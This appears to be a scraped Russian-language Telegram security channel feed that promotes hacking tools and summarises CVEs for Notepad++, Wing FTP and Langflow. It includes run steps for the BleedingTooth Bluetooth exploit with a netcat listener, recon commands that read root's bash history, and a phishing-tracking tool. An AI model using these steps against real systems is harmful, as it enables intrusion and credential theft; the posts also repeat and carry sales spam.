Что вы получаете приобретая подписку ?
Весь контент — для образовательных целей. Автор не несет ответственности за незаконное использование.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💔4
Бесплатная обучающая игра по SQL вдохновленная сериалом «Игра в кальмара». Всего 9 тематических уровней, в каждом из которых спрятана задача. Ошиблись — придется начинать заново. С каждым уровнем задания становятся всё сложнее, но везде даётся по 2 подсказки.
Если навыков не хватает или хотите выучить SQL с нуля, то есть 33 бесплатных урока, чтобы подтянуть знания.
👉 Подписаться 👈
#sql #game
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12💔3
Wave - терминал с открытым исходным кодом, который сочетает в себе традиционные возможности терминала с графическими возможностями, такими как предварительный просмотр файлов, веб-браузинг и помощь ИИ. Он работает на MacOS, Linux и Windows.
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#terminal
👉 Подписаться 👈
#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤1
👉 Подписаться 👈
#Keylogger #Python #OpenSource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
Forwarded from Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
Запуск:
В другом терминале выполнить:
При успешной эксплуатации для запуска калькулятора выполнится:
Успешность: ~80% для целевой версии ядра.
Ограничения:
⏺ Bluetooth должен быть активен и доступен для подключения.
⏺ SELinux/AppArmor могут блокировать выполнение кода.
⏺ Современные ядра (после 5.15) не уязвимы.
Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
$ gcc -o exploit BleedingTooth.c -lbluetooth
Запуск:
$ sudo ./exploit MAC-адрес атакуемого устройства
В другом терминале выполнить:
$ nc -lvp 1337
При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator
Успешность: ~80% для целевой версии ядра.
Ограничения:
Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой. BleedingTooth: Удалённое выполнение…
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8
CVE-2025-49144 — это уязвимость с высоким уровнем риска, связанная с повышением локальных привилегий, обнаруженная в установщиках Notepad++ версии 8.8.1 и более ранних версий. Эта уязвимость возникает из-за неконтролируемого поведения пути поиска исполняемых файлов во время установки, что позволяет локальному злоумышленнику получить привилегии системного уровня, поместив вредоносные исполняемые файлы в тот же каталог, что и установщик.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE #Windows #Linux
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#CVE #Windows #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10💔1
WebVM — это проект, реализующий виртуальную машину, способную запускать операционные системы и программы внутри веб-браузера.
⏺ Поддерживает множество архитектур и операционных систем, предоставляя удобный способ работать с ними онлайн.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#Web #OpenSource #Linux
Это позволяет создавать полностью автономные среды для тестирования, обучения и разработки без необходимости установки дополнительного ПО.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Web #OpenSource #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤1
CVE-2025-47812 — это серьёзная проблема, вызванная многочисленными недостатками в системе аутентификации пользователей и управления сеансами Wing FTP Server.
Эта уязвимость особенно опасна, поскольку Wing FTP Server часто работает с привилегиями root в Linux или привилегиями SYSTEM в Windows по умолчанию. Такая конфигурация по умолчанию даёт злоумышленникам максимальный контроль над взломанной системой в случае успешной эксплуатации.
Затронутые версии: уязвимы версии Wing FTP Server до 7.4.4.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE
Эта уязвимость особенно опасна, поскольку Wing FTP Server часто работает с привилегиями root в Linux или привилегиями SYSTEM в Windows по умолчанию. Такая конфигурация по умолчанию даёт злоумышленникам максимальный контроль над взломанной системой в случае успешной эксплуатации.
Затронутые версии: уязвимы версии Wing FTP Server до 7.4.4.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤1💔1
Kingfisher — это инструмент, разработанный для анализа и валидации конфигураций MongoDB, помогающий выявлять потенциальные проблемы безопасности, производительности и соответствия лучшим практикам.
⏺ Он сканирует конфигурационные файлы MongoDB, выявляет отклонения от рекомендуемых настроек и генерирует отчеты с рекомендациями по улучшению конфигурации.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#MongoDB #DB
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#MongoDB #DB
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤1
Trape — это инструмент для отслеживания и профилирования людей в интернете, использующий методы социальной инженерии и OSINT.
⏺ Trape предназначен для тестирования на проникновение и оценки рисков, связанных с социальной инженерией.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#OSINT
Он позволяет создавать реалистичные фишинговые кампании, собирать информацию о пользователях, включая их IP-адреса, геолокацию, используемое устройство, браузер и другие данные.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤3
This media is not supported in your browser
VIEW IN TELEGRAM
Просматривайте веб-страницы, и браузер автоматически проверит их на наличие уязвимостей Reflected, Stored и DOM XSS в фоновом режиме. Также поддерживает POST запросы.
При нахождении уязвимости, отобразит ее в новом окне вместе с примером эксплуатации.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤3
🔥Evil Foca — инструмент для проверок различных сетевых атак в сетях IPv4 и IPv6.
Сканирует локальную сеть, идентифицируя устройства, маршрутизаторы и их сетевые интерфейсы, после чего можно совершать различные атаки на участников сети.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#scan
Сканирует локальную сеть, идентифицируя устройства, маршрутизаторы и их сетевые интерфейсы, после чего можно совершать различные атаки на участников сети.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#scan
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
⚙ Nautilus — официальный файловый менеджер для рабочей среды GNOME. В названии присутствует игра слов, связанная с изображением раковины моллюска наутилуса для представления оболочки операционной системы (англ. shell — это и раковина, и оболочка ОС).
Nautilus заменил Midnight Commander в GNOME 1.4 и стал файловым менеджером по умолчанию начиная с версии 2.0.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#terminal
Nautilus заменил Midnight Commander в GNOME 1.4 и стал файловым менеджером по умолчанию начиная с версии 2.0.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤1
Raspirus — это сканер вредоносного программного обеспечения, разработанный с акцентом на простоту использования и минимальное потребление ресурсов, работающий на основе настраиваемых правил.
➖ Он позволяет обнаруживать вредоносное ПО на различных платформах, используя базу правил, определяющих известные вредоносные программы и подозрительное поведение.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#Scan #Malware
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Scan #Malware
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
Системы SCADA (диспетчерского управления и сбора данных) являются одними из важнейших компонентов на любых производствах, так как они позволяют контролировать промышленные процессы.
Ввиду обширного разнообразия подобных систем, сбои в них могут повлечь за собой различные последствия, не говоря о ситуациях, когда в игру вступают недоброжелатели. В зависимости от вида атаки, условий её реализации, целей злоумышленников и компетенций персонала, всё может закончиться простым похищением данных (которые впоследствии злоумышленники используют для шантажа, дискредитации или перепродажи). Но совсем иначе обстоит вопрос, если целью вредителей является диверсия, ведь в подобном случае, здоровью людей и окружающей среде грозит серьезная опасность. Именно поэтому сохранение контроля над системами SCADA является важнейшей задачей для любого промышленного предприятия.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#scada
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤1
CVE-2025-3248 новая уязмостью в Langflow которую активно эксплуатируют
Langflow — популярный Python-фреймворк для создания AI-приложений, который используют разработчики по всему миру. Но есть нюанс — критическая уязвимость с CVSS 9.8, которую уже активно эксплуатируют для развертывания ботнета Flodrix.
➡️ Технические детали
➡️ Тип уязвимости: Неаутентифицированное удаленное выполнение кода (RCE)
➡️ Затронутые версии: Langflow до версии 1.3.0
➡️ Вектор атаки: POST-запросы к эндпоинту
➡️ Механизм: Недостаточная валидация входных данных при компиляции Python-кода
➡️ Процесс эксплуатации
1. Сбор IP-адресов публично доступных серверов Langflow через Shodan/FOFA
2. Использование публичного PoC для получения удаленного доступа
3. Выполнение разведывательных команд (
4. Загрузка и установка ботнета Flodrix
5. Установка связи с C&C сервером для координации DDoS-атак
➡️ Последствия
➡️ Полная компрометация системы
➡️ Участие в DDoS-атаках
➡️ Потенциальная утечка чувствительных данных и конфигураций
➡️ Что делать
Если используете Langflow — немедленно обновляйтесь до версии 1.3.0 или выше. Проверьте логи на предмет подозрительных POST-запросов к
Ботнет Flodrix уже показал себя как серьезная угроза, так что не тяните с патчингом. Особенно если ваши AI-приложения доступны из интернета.
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE
Langflow — популярный Python-фреймворк для создания AI-приложений, который используют разработчики по всему миру. Но есть нюанс — критическая уязвимость с CVSS 9.8, которую уже активно эксплуатируют для развертывания ботнета Flodrix.
/api/v1/validate/code
1. Сбор IP-адресов публично доступных серверов Langflow через Shodan/FOFA
2. Использование публичного PoC для получения удаленного доступа
3. Выполнение разведывательных команд (
whoami
, printenv
, cat /root/.bash_history
)4. Загрузка и установка ботнета Flodrix
5. Установка связи с C&C сервером для координации DDoS-атак
Если используете Langflow — немедленно обновляйтесь до версии 1.3.0 или выше. Проверьте логи на предмет подозрительных POST-запросов к
/api/v1/validate/code
. И да, если ваш сервер был скомпрометирован — полная переустановка системы, никаких полумер.Ботнет Flodrix уже показал себя как серьезная угроза, так что не тяните с патчингом. Особенно если ваши AI-приложения доступны из интернета.
👉 Подписаться 👈
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10